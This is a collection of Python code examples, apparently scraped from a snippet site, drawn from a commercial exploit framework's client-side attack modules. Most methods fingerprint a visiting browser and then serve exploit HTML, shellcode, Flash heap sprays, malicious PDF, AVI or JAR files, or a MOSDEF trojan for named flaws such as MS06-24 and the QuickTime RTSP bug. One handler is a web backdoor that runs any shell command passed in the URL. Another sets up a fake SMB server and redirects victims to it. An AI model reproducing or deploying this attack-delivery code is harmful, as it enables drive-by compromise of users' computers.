Пример #1
0
 def makesploit(self, clientheader, clientbody):
     from libs.spkproxy import header, body
     # header is used to store request and reponse headers
     header=header('SERVER')
     body=body()
     # Clientd gives us a lot of information about the remote endpoint
     if self.plugin_info:
         # Check if the remote endpoint is vulnerable to our exploit
         if self.is_vulnerable(self.plugin_info)==0:
             self.log('Bailing on this client as it is not likely to be vulnerable')
             #Return a 404 here?
             return None,None
     if clientheader.URL.count(self.filename):
         self.log('%s: Serving HTML file'%self.name)
         # Create the shellcode (self.shellcode)
         self.createShellcode()
         # Create the HTML Contents
         html=self.makefile(request_header=clientheader)
         if not html:
             self.log("%s: Error creating HTML for this exploit"%self.name)
             return None, None #done
         body.setBody(html)
         header.addHeader('Content-Type','text/html')
         header.addHeader('Set-Cookie','SessionID=%d'%(self.jsObfuscator.getXORKey()))
     else:
         self.log('%s: Redirecting to self'%self.name)
         header.status='302'
         header.addHeader('Location',self.filename)
         header.addHeader('Content-Type','text/html')
     return header,body
Пример #2
0
 def makesploit(self,clientheader,clientbody):
     """
     Construct the attack
     """
     from libs.spkproxy import header, body
     h=header('SERVER')
     b=body()
     user_agent=clientheader.getStrValue(['User-Agent'])
     self.log('User agent of connecting host: %s'%user_agent)
     if clientheader.URL.count(self.filename):
         #the exploit
         self.log('Sending the MS06-24 attack html file')
         sploitstring=self.makefile()
         b.setBody(sploitstring)
         h.addHeader('Content-Type','text/html')
     elif clientheader.URL.count(self.downloadfilename):
         self.log('Sending the evil skin file')
         sploitstring=self.makedownloadfile()
         self.log('Sending %d bytes'%len(sploitstring))
         h.addHeader('Content-type','binary/octet-stream')
         h.addHeader('Connection','close')
         b.setBody(sploitstring)
     else:
         #redirect to self
         self.log('redirecting to self')
         h.status='302'
         h.addHeader('Location',self.filename)
         h.addHeader('Content-Type','text/html')
     return h,b
Пример #3
0
    def makesploit(self, clientheader, clientbody):
        from libs.spkproxy import header, body
        h = header('SERVER')
        b = body()

        if clientheader.URL.count(self.filename):
            sploitstring = self.makefile()
            b.setBody(sploitstring)
        elif clientheader.URL.count(self.trojanname):
            self.maketrojan()
            self.log("Sending MOSDEF trojan")
            f = open(self.trojanname, "rb")
            sploitstring = f.read()
            f.close()
            os.remove(self.trojanname)
            self.log("Sending %d bytes" % len(sploitstring))
            h.addHeader("Content-type", "binary/octet-stream")
            h.addHeader("Connection", "close")
            b.setBody(sploitstring)
        else:
            self.log('Redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'binary/octet-stream')
        return h, b
Пример #4
0
    def makesploit(self, clientheader, clientbody):
        from libs.spkproxy import header, body
        h = header('SERVER')
        b = body()

        if clientheader.URL.count(self.filename):
            self.log("Sending HTML file: %s" % (self.filename))
            self.maketrojan()
            sploitstring = self.makefile()
            b.setBody(sploitstring)
        elif clientheader.URL.count(self.pcbfile):
            self.log("Sending PCB file")
            f = open(
                os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_autovue/" +
                self.pcbfile, "rb")
            sploitstring = f.read()
            f.close()
            self.log("Sending %d bytes" % len(sploitstring))
            h.addHeader("Content-type", "binary/octet-stream")
            h.addHeader("Connection", "close")
            b.setBody(sploitstring)
        else:
            self.log('Redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'binary/octet-stream')

        return h, b
Пример #5
0
    def makesploit(self, clientheader, clientbody):
        """
        Construct the attack
        """
        from libs.spkproxy import header, body
        h = header("SERVER")
        b = body()
        user_agent = clientheader.getStrValue(["User-Agent"])
        self.log("User agent of connecting host: %s" % user_agent)
        if user_agent.count("MSIE") == 0:
            #still need to determine if it's pretending to be IE by spoofing User-Agent string
            self.log("Non IE browser connected - returning None")
            return None, None

        if user_agent.lower().count("windows nt") == 0:
            #all the supported versions are NT based
            return None, None

        #the ugliest python line ever
        windowsver = user_agent.lower().split("windows nt ")[1].split(
            ";")[0].split(")")[0]

        #send the exploit
        self.log("Sending the GOMPlayer attack html file")
        sploitstring = self.makefile(windowsver)

        if not sploitstring:
            return None, None

        b.setBody(sploitstring)

        return h, b
Пример #6
0
 def makesploit(self,clientheader,clientbody):
     from libs.spkproxy import header,body
     h=header('SERVER')
     b=body()
     if clientheader.URL.count(self.htmlfilename):
         self.log('Serving HTML file')
         b.setBody(self.makeHTML())
         h.addHeader('Content-Type','text/html')
     elif clientheader.URL.count(self.jsfilename):
         self.log('Serving JS file')
         b.setBody(self.makeJS())
         h.addHeader('Content-Type','text/javascript')
     elif clientheader.URL.count(self.dest_heapspray):
         self.log('Serving SWF heapspray')
         self.createShellcode()
         b.setBody(self.makeSWF())
         h.addHeader('Content-Type','application/x-shockwave-flash')
     elif clientheader.URL.count(self.dest_trigger):
         self.log('Serving SWF trigger')
         b.setBody(file(self.source_trigger,"rb").read())
         h.addHeader('Content-Type','application/x-shockwave-flash')
     elif clientheader.URL.count(self.dest_pdf):
         self.log('Serving PDF file')
         self.createShellcode()
         b.setBody(self.makePDF())
         h.addHeader('Content-Type','application/pdf')
     else:
         self.log('redirecting to self')
         h.status='302'
         h.addHeader('Location',self.htmlfilename)
         h.addHeader('Content-Type','text/html')
     return h,b
Пример #7
0
    def makesploit(self, clientheader, clientbody):
        self.createShellcode()

        # The main call from ClientD
        from libs.spkproxy import header, body

        h = header('SERVER')
        b = body()

        self.log('WP> ****************************************')
        self.log("WP> URL Received: %s" % clientheader.URL)
        user_agent = clientheader.getStrValue(['User-Agent'])
        cookies = clientheader.getStrValue(['Cookie'])

        # Get details
        browser, osversion = wp_browserinfo(user_agent)
        self.log('WP> OSVersion: %s' % osversion)
        self.log('WP> Browser: %s' % browser)
        self.log('WP> ')

        if clientheader.URL.count(self.filename):

            data = self.makefile(browser, osversion)
            if not data:
                return None, None
            b.setBody(data)
            h.addHeader('Content-Type', 'text/html')
            h.addHeader('Set-Cookie',
                        'SessionID=%d' % self.jsObfuscator.getXORKey())
        else:
            self.log('WP> Redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'text/html')
        return h, b
Пример #8
0
    def makesploit(self,clientheader,clientbody):
        """
        Construct the attack
        """
        from libs.spkproxy import header, body

        h=header("SERVER")
        b=body()
        user_agent=clientheader.getStrValue(["User-Agent"])
        self.log("User agent of connecting host: %s"%user_agent)
        if user_agent.count("MSIE")==0:
            #still need to determine if it's pretending to be IE by spoofing User-Agent string
            self.log("Non IE browser connected - returning None")
            return None,None

        if user_agent.lower().count("windows nt") == 0:
            #all the supported versions are NT based
            return None,None

        #send the exploit
        self.log("Sending the msparsing_xml attack html file")
        sploitstring=self.makefile( clientheader )

        if not sploitstring:
            return None,None

        b.setBody(sploitstring)
        if "<html>" in sploitstring.lower():
            h.addHeader("Content-Type","text/html")
        else:
            h.addHeader("Content-Type","application/octet-stream")

        return h,b
Пример #9
0
    def makesploit(self,clientheader,clientbody):
        """
        Construct the attack
        """
        from libs.spkproxy import header, body
        h=header("SERVER")
        b=body()
        user_agent=clientheader.getStrValue(["User-Agent"])
        self.log("User agent of connecting host: %s"%user_agent)

        if clientheader.URL.count(self.filename):
            #the exploit
            self.log("Sending the MS06-24 attack html file")
            sploitstring=self.makefile()
            b.setBody(sploitstring)

        elif clientheader.URL.count(self.downloadfilename):
            self.log("Sending the evil skin file")
            sploitstring=self.makedownloadfile()
            self.log("Sending %d bytes"%len(sploitstring))
            h.addHeader("Content-type","binary/octet-stream")
            h.addHeader("Connection","close")
            b.setBody(sploitstring)
        else:
            #redirect to self
            self.log("redirecting to self")
            h.status="302"
            h.addHeader("Location",self.filename)
            h.addHeader("Content-Type","text/html")
        return h,b
Пример #10
0
    def makesploit(self, clientheader, clientbody):
        """
        Called automatically
        """
        from libs.spkproxy import header, body

        # header is used to store request and reponse headers
        header = header('SERVER')
        body = body()

        if clientheader.URL.count(self.filename):
            self.log('Serving HTML file')

            # Create the shellcode (self.shellcode)
            self.createShellcode()

            # Create the HTML Contents
            html = self.makefile(request_header=clientheader)

            body.setBody(html)
            header.addHeader('Content-Type', 'text/html')
            header.addHeader('Set-Cookie',
                             'SessionID=%d' % self.jsObfuscator.getXORKey())
        else:
            self.log('Redirecting to self')
            header.status = '302'
            header.addHeader('Location', self.filename)
            header.addHeader('Content-Type', 'text/html')

        return header, body
Пример #11
0
    def makesploit(self,clientheader,clientbody):
        """
        Construct the attack
        """
        from libs.spkproxy import header, body
        h=header("SERVER")
        b=body()
        self.log("Request: "+clientheader.URL)
        if clientheader.URL.count(self.filename):
            #the exploit
            self.log("sending HTML")
            self.createShellcode()
            sploitstring=self.makefile()
            b.setBody(sploitstring)
            h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
            h.addHeader("Content-Type","text/html")
        elif len(clientheader.URL) > 3:
            self.log("sending CSS")
            sploitstring=self.makecss()
            b.setBody(sploitstring)
            h.addHeader("Content-Type","text/css")
        else:
            #redirect to self
            self.log("redirecting to self")
            h.status="302"
            h.addHeader("Location",self.filename)
            h.addHeader("Content-Type","text/html")

        return h,b
Пример #12
0
 def makesploit(self, clientheader, clientbody):
     from libs.spkproxy import header, body
     h = header('SERVER')
     b = body()
     if clientheader.URL.count(self.htmlfilename):
         self.log('Serving HTML file')
         b.setBody(self.makeHTML())
         h.addHeader('Content-Type', 'text/html')
     elif clientheader.URL.count(self.jsfilename):
         self.log('Serving JS file')
         b.setBody(self.makeJS())
         h.addHeader('Content-Type', 'text/javascript')
     elif clientheader.URL.count(self.swffilename):
         self.log("Serving our attack SFW")
         flash_version = clientheader.getStrValue(['x-flash-version'])
         flash_version = flash_version.replace(',', '.')
         for i in range(len(targets)):
             if flash_version == targets[i][1]:
                 self.clientversion = i
                 break
         if self.clientversion == 0:
             self.log('Unknown Adobe Flash Player v%s' % (flash_version))
             h.status = '404'
             return h, b
         self.log('Serving SWF file for Adobe Flash Player v%s' %
                  (flash_version))
         self.createShellcode()
         b.setBody(self.makeSWF())
         h.addHeader('Content-Type', 'application/x-shockwave-flash')
     else:
         self.log('redirecting to self')
         h.status = '302'
         h.addHeader('Location', self.htmlfilename)
         h.addHeader('Content-Type', 'text/html')
     return h, b
Пример #13
0
    def makesploit(self,clientheader,clientbody):
        """
        Construct the attack
        """
        from libs.spkproxy import header, body
        h=header("SERVER")
        b=body()
        user_agent=clientheader.getStrValue(["User-Agent"])
        self.log("User agent of connecting host: %s"%user_agent)
        if user_agent.count("MSIE")==0:
            #still need to determine if it's pretending to be IE by spoofing User-Agent string
            self.log("Non IE browser connected - returning None")
            return None,None
        
        
        #send the exploit
        self.log("Sending the Speech attack html file")
        sploitstring=self.makefile()
        
        if not sploitstring:
            return None,None
        
        b.setBody(sploitstring)

        return h,b
Пример #14
0
    def makesploit(self, clientheader, clientbody):
        from libs.spkproxy import header, body
        h = header('SERVER')
        b = body()

        # .NET DLL request
        if clientheader.URL.count("d2.dll"):
            self.log("Sending .NET DLL file")
            p = PElib()
            sploitstring = p.createDotNETPEFileBuf(
                ("\x90" * 0xd000) + self.createShellcode(), 0x74000000)
            h.addHeader('Content-Type', 'application/octet-stream')
            b.setBody(sploitstring)

        # AVI file request
        elif clientheader.URL.count(self.avifile):
            self.log("Sending AVI file")
            f = open(
                os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_directshow/" +
                self.avifile, "rb")
            sploitstring = f.read()
            f.close()
            h.addHeader('Content-Type', 'application/octet-stream')
            b.setBody(sploitstring)

# Index file request
        else:
            sploitstring = self.makefile()
            h.addHeader('Content-Type', 'text/html')
            b.setBody(sploitstring)

        return h, b
Пример #15
0
    def makesploit(self, clientheader, clientbody):
        h = header('SERVER')
        b = body()

        self.rop = self.get_rop()

        if clientheader.URL.endswith(self.filename):
            self.log('Serving HTML file')

            self.createAndEncodeShellcode()
            html = self.generate_html()

            b.setBody(html)
            h.addHeader('Content-Type','application/xhtml+xml')

        elif clientheader.URL.count("exit"):
            self.log('[-] Max retries reached. Exploit failed')
            h.status='302'
            h.addHeader('Location',"http://www.google.com")
            h.addHeader('Content-Type','text/html')
            return h, b

        else:
            self.log('[+] Redirecting to self')
            h.status='302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type','text/html')

        return h, b
Пример #16
0
    def makesploit(self, clientheader, clientbody):
        from libs.spkproxy import header, body
        h = header('SERVER')
        b = body()

        self.binpath = self.argsDict.get("binpath", self.binpath)

        if (self.binpath == ""):
            self.maketrojan()

        if clientheader.URL.count(self.filename):
            sploitstring = self.makefile()
            b.setBody(sploitstring)

        # JAR file request
        elif clientheader.URL.count(self.jarfile):
            self.log("Sending JAR file")
            f = open(
                os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_applet/" +
                self.jarfile, "rb")
            sploitstring = f.read()
            f.close()
            self.log("Sending %d bytes" % len(sploitstring))
            h.addHeader("Content-type", "binary/octet-stream")
            h.addHeader("Connection", "close")
            b.setBody(sploitstring)

        # Redirect
        else:
            self.log('Redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'binary/octet-stream')

        return h, b
Пример #17
0
    def request_id(self, s):
        devlog('http_proxy', 'Handling incoming HTTP request')
        clientheader = header(state='SERVER')
        devlog('http_proxy', 'Setting header.useSSL to %d' % self.useSSL)
        clientheader.useSSL = self.useSSL

        if self.useSSL == True:
            spike_fd = MyConnection(s, directSSL=True)
            ret = spike_fd.startSSLserver()
            if ret == False:
                print "XXX: SSL handshake failed."
                return (None, None, None)
        else:
            spike_fd = s
        ret = clientheader.readdata(spike_fd)
        if not ret:
            self.log("XXX: connection aborted!?")
            return (None, None, None)

        if 'X-id' not in clientheader.headerValuesDict:
            print repr(clientheader.headerValuesDict)
            self.log('This is not a _new_ HTTP MOSDEF client ...')
            if clientheader.URL == '/w':
                self.log("Handling old-style payload backwards compatibility")
                self.backwards_compatible(clientheader, spike_fd)
            else:
                self.log('Unknown HTTP client header:')
                print repr(clientheader)
            return (None, None, None)

        client_id = clientheader.getStrValue(['X-id'])

        return (clientheader, client_id, spike_fd)
Пример #18
0
 def handle(self, infd):
   self.log("[D2] Handling connection")
   clientheader = header(state = "SERVER")
   clientheader.ssl = self.ssl
   ret = clientheader.readdata(infd)
   clientbody = body()
   if clientheader.gotGoodHeader():
     if clientheader.bodySize()>0 or clientheader.wasChunked:
       self.log("[D2] Reading body")
       clientbody.read(infd, clientheader.bodySize(), clientheader.wasChunked, 0)
       self.log("[D2] Read body")
   self.log("[D2] Creating exploit response")
   servheader,servbody = self.makesploit(clientheader,clientbody)
   self.log("[D2] Responding")
   bodydata="".join(servbody.data)
   response = ""
   response += "%s %s %s\r\n"%(servheader.version, servheader.status, servheader.msg)
   self.log(response)
   for akey in servheader.headerValuesDict.keys():
     if akey not in [ "Content-Length", "Content-length"]:
       response += servheader.grabHeader(akey)
   self.log("[D2] Sending header data of %d bytes"%len(response))
   chunked=0
   if not chunked:
     response+="Content-Length: "+str(len(bodydata))+"\r\n"
   response+="\r\n"
   response+="".join(bodydata)
   self.log("[D2] Total response length is %d bytes"%len(response))
   try:
     infd.sendall(response)
   except socket.error:
     self.log("[D2] Connection closed by peer")
   self.log("[D2] Response sent")
   infd.close()
   return
Пример #19
0
    def makesploit(self, clientheader, clientbody):
        h = header('SERVER')
        b = body()

        # set up the browser target
        ua = clientheader.getHeaderValue('User-Agent')

        if self.plugin_info:
            info_dict = self.plugin_info
            self.log("We got a plugin info for this target - thanks clientd!")

            if self.is_vulnerable(self.plugin_info):
                self.log("This client is most likely vulnerable!")
            else:
                self.log(
                    "Bailing on this client as it is not likely to be vulnerable (%s)"
                    % self.plugin_info.get("language"))
                return None, None

        if clientheader.URL.count(self.filename):
            self.log('Serving stage 1 HTML file')
            self.createAndEncodeShellcode()
            stage1html = self.makefile(request_header=clientheader, stage=1)
            b.setBody(stage1html)
            h.addHeader('Content-Type', 'text/html')
        else:
            self.log('redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'text/html')
        return h, b
Пример #20
0
    def makesploit(self, clientheader, clientbody):   
        # Start fake SMB server
        self.smblock = threading.Lock()
        self.smbinit = 0
        t = smbServerThread(self)
        t.start()
        self.threads += [t]
        time.sleep(1)
        self.smblock.acquire()

        if self.smbinit != 1:
            self.state = self.HALT
            self.log("Could not listen on port 445. You should be running as root!")
            return 0

        self.smblock.release() 
               
        # Make trojan
	self.maketrojan()

        from libs.spkproxy import header, body
        h = header('SERVER')
        b = body()
        
        if clientheader.URL.count(self.filename):
            self.createShellcode()
            sploitstring = self.makefile()            
            b.setBody(sploitstring)
        else:
            self.log('Redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'binary/octet-stream')
        return h, b
Пример #21
0
 def makesploit(self, clientheader, clientbody):
     """
     For use by exploits/httpserver/httpserver.py -O singleexploit:runcommand -O blind:1
     
     This is useful as a simple www backdoor (probably not used)
     but more likely used for demonstrating and testing 
     our CommandLineExecuter abilities.
     """
     from libs.spkproxy import header, body
     import urllib
     h = header("SERVER")
     b = body()
     user_agent = clientheader.getStrValue(["User-Agent"])
     self.log("User agent of connecting host: %s" % user_agent)
     clientheader.normalize()
     command = urllib.unquote_plus(
         clientheader.URLargsDict.get("command", ""))
     self.log("URLArgs: %s" % clientheader.URLargsDict)
     self.log("Executing command: %s" % command)
     result = os.popen2(command)[1].read()
     if self.blind:
         self.log("Blind, so just returning ok")
         sploitstring = "ok"
     else:
         self.log("Non-blind, getting result")
         sploitstring = result
     self.log("Sending %d bytes" % len(sploitstring))
     h.addHeader("Content-type", self.datatype)
     h.addHeader("Connection", "close")
     b.setBody(sploitstring)
     return h, b
Пример #22
0
    def makesploit(self,clientheader,clientbody):
        """
        Construct the attack
        """
        from libs.spkproxy import header, body
        h=header("SERVER")
        b=body()
        user_agent=clientheader.getStrValue(["User-Agent"])
        self.log("User agent of connecting host: %s"%user_agent)
        
        if ".jar" in clientheader.URL:
            f = open(os.path.join("Resources","javanode.jar"),"rb")
            sploitstring = f.read()
            f.close()
            h.addHeader("Content-Type","application/octet-stream")
        elif ".odb" in clientheader.URL:
            sploitstring = self.makefile()
            h.addHeader("Content-Type","application/vnd.oasis.opendocument.database")        
        else:
            #redirect to self
            self.log("redirecting to self")
            h.status="302"
            h.addHeader("Location",self.filename)
            h.addHeader("Content-Type","text/html")
            return h,b

        self.log("Sending %d bytes"%len(sploitstring))
        
        h.addHeader("Connection","close")
        b.setBody(sploitstring)
                    
        return h,b
Пример #23
0
    def makesploit(self, clientheader, clientbody):    
        # we are platform independent
        from libs.spkproxy import header, body
        h           = header('SERVER')
        b           = body()
        user_agent  = clientheader.getStrValue(['User-Agent'])
        
        self.log("[+] User agent of connecting host: %s" % user_agent)        
        if clientheader.URL.count(self.htmlfile):
            self.log("[+] Sending HTML")
            b.setBody(self.makefile())
            
        elif clientheader.URL.count(self.jarfile):
            self.log("[+] Sending JAR")
            data = self.makedownloadfile()
            self.log("[+] Sending %d bytes" % len(data))
            h.addHeader('Content-type', 'binary/octet-stream')
            h.addHeader('Connection', 'close')
            b.setBody(data)

        else:
            self.log("[+] Redirect to %s" % self.htmlfile)
            h.status = '302'
            h.addHeader('Location', self.htmlfile)
            h.addHeader('Content-Type', 'text/html')

        return h,b
Пример #24
0
    def makesploit(self,clientheader,clientbody):
        from libs.spkproxy import header,body
        
        h=header('SERVER')
        b=body()
        if self.plugin_info:
            info_dict=self.plugin_info
            self.log("We got a plugin info for this target - thanks clientd!")
            
            if self.is_vulnerable(self.plugin_info):
                self.log("This client is most likely vulnerable!")
                #check for IE 6
                if info_dict['user_agent'].count('MSIE 6'):
                    self.msie6 = True
                else:
                    self.msie6 = False     			            
            else:
                self.log("Bailing on this client as it is not likely to be vulnerable (%s)"%self.plugin_info.get("language"))
                return None, None

        if clientheader.URL.count(self.filename):
            self.log('Serving HTML file')
            self.createShellcode()
            sploitstring=self.makefile(request_header = clientheader)
            b.setBody(sploitstring)
            h.addHeader('Content-Type','text/html')
            h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
        else:
            self.log('redirecting to self')
            h.status='302'
            h.addHeader('Location',self.filename)
            h.addHeader('Content-Type','text/html')
        return h,b
Пример #25
0
    def makesploit(self, clientheader, clientbody):
        """
        Construct the attack
        """

        import threading
        import time
        self.smblock = threading.Lock()
        self.smbinit = 0
        self.SMBthr = threading.Thread(target=self.setupSMBServer)
        self.SMBthr.start()
        time.sleep(1)

        self.smblock.acquire()
        if self.smbinit != 1:
            raise Exception, "Could not listen on port 445. You should be running as administrator/root"
        self.smblock.release()

        from libs.spkproxy import header, body
        h = header("SERVER")
        b = body()
        #redirect to smbserver
        self.log("redirecting to smbserver")
        h.status = "302"
        h.addHeader("Location", "\\\\%s\\NamedPipe\\foo" % self.callback.ip)
        h.addHeader("Content-Type", "foo/moo")

        return h, b
Пример #26
0
    def makesploit(self, clientheader, clientbody):
        from libs.spkproxy import header, body
        h = header('SERVER')
        b = body()

        self.maketrojan()

        if clientheader.URL.count("jconsole"):
            self.log("Sending HTML page")
            sploitstring = self.makefile()
            self.log("Sending %d bytes" % len(sploitstring))
            h.addHeader("Connection", "close")
            b.setBody(sploitstring)
        elif clientheader.URL.count(self.trojanname):
            self.log("Sending MOSDEF trojan")
            f = open(self.trojanname, "rb")
            sploitstring = f.read()
            f.close()
            os.remove(self.trojanname)
            self.log("Sending %d bytes" % len(sploitstring))
            h.addHeader("Content-type", "binary/octet-stream")
            h.addHeader("Connection", "close")
            b.setBody(sploitstring)

        return h, b
Пример #27
0
    def makesploit(self, clientheader, clientbody):
        self.createShellcode()

        # The main call from ClientD
        from libs.spkproxy import header, body

        h = header('SERVER')
        b = body()

        self.log("WP> URL Received: %s" % clientheader.URL)
        user_agent = clientheader.getStrValue(['User-Agent'])

        self.log('WP> User agent of connecting host: %s' % user_agent)

        if clientheader.URL.count(self.filename):
            self.log('WP> Serving exploit file')

            data = self.makefile()
            if not data:
                return None, None
            b.setBody(data)
            h.addHeader('Content-Type', 'text/html')
            h.addHeader('Set-Cookie',
                        'SessionID=%d' % self.jsObfuscator.getXORKey())
        else:
            self.log('WP> Redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'text/html')

        return h, b
Пример #28
0
    def makesploit(self, clientheader, clientbody):
        from libs.spkproxy import header, body

        h = header('SERVER')
        b = body()
        if self.plugin_info:
            info_dict = self.plugin_info
            self.log("We got a plugin info for this target - thanks clientd!")

            if self.is_vulnerable(info_dict):
                self.log("This client is most likely vulnerable!")
            else:
                self.log(
                    "Bailing on this client as it is not likely to be vulnerable."
                )
                return None, None

        if clientheader.URL.count(self.filename):
            self.log('Serving HTML file')
            sploitstring = self.makefile()
            b.setBody(sploitstring)
            h.addHeader('Content-Type', 'text/html')
            #h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
        else:
            self.log('redirecting to self')
            h.status = '302'
            h.addHeader('Location', self.filename)
            h.addHeader('Content-Type', 'text/html')
        return h, b
Пример #29
0
    def makesploit(self,clientheader,clientbody):
        """
        Construct the attack
        """
        from libs.spkproxy import header, body
        h=header("SERVER")
        b=body()

        if "MSIE 5." in clientheader.getHeaderValue("User-Agent"):
            self.log("MSIE 5. found. Serving blank header/body")
            return h,b

        if clientheader.URL.count( self.cab_file ):

            # The CAB file was requested.
            self.log("Redirecting to CAB file for installation.")
            h.addHeader("Content-Type","binary/octet-stream")

            cabfd = open( os.path.join(self.engine.config["canvas_resources"],self.cab_file), "rb" )
            cab = cabfd.read()
            cabfd.close()
            b.setBody( cab )
        else:
            # Serve up our HTML page that loads the ActiveX
            self.log("Serving HTML page to load ActiveX")
            sploitstring=self.makefile()
            self.log("File: %s"%sploitstring)
            b.setBody(sploitstring)


        return h,b
Пример #30
0
    def web_makesploit(self,clientheader,clientbody):
        """
        Construct the attack
        """

        #make the HTML response page
        from libs.spkproxy import header, body
        h=header("SERVER")
        b=body()
        user_agent=clientheader.getStrValue(["User-Agent"])
        self.log("User agent of connecting host: %s"%user_agent)
        if user_agent.count("MSIE")==0 and user_agent.count("Firefox")==0:
            self.log("Non IE browser connected - returning None")
            return None,None

        #send the exploit
        self.log("Sending the Quicktime 7.3 RTSP attack html file")
        sploitstring=self.makefile()

        if not sploitstring:
            return None,None

        b.setBody(sploitstring)

        return h,b